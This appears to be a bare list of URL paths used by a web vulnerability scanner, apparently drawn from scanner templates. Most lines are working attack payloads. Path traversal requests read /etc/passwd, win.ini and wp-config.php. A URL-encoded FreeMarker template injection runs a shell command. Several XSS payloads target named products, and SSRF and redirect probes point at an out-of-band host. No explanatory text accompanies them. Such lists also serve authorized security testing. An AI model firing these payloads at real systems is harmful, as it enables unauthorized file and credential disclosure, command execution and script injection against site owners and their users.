/?id={{str}}%25{128*128}
/cgi-bin/file_transfer.cgi
/lab.html?vpath=//interact.sh
/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d
/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini
/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini
/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php
/cache/backup/
/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything
/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything
/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd
/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini
/download/C%3a%2fwindows%2fsystem.ini
/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>
/.travis.yml
/matomo/.travis.yml
/ckeditor/.travis.yml

/server/status
/uddiexplorer/
/.gitignore
/assets/.gitignore
/includes/.gitignore
/stats/index.html
/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL
/labkey/__r1/login-login.view?returnUrl=http://interact.sh
/plugins/servlet/gadgets/makeRequest
/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo
/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1
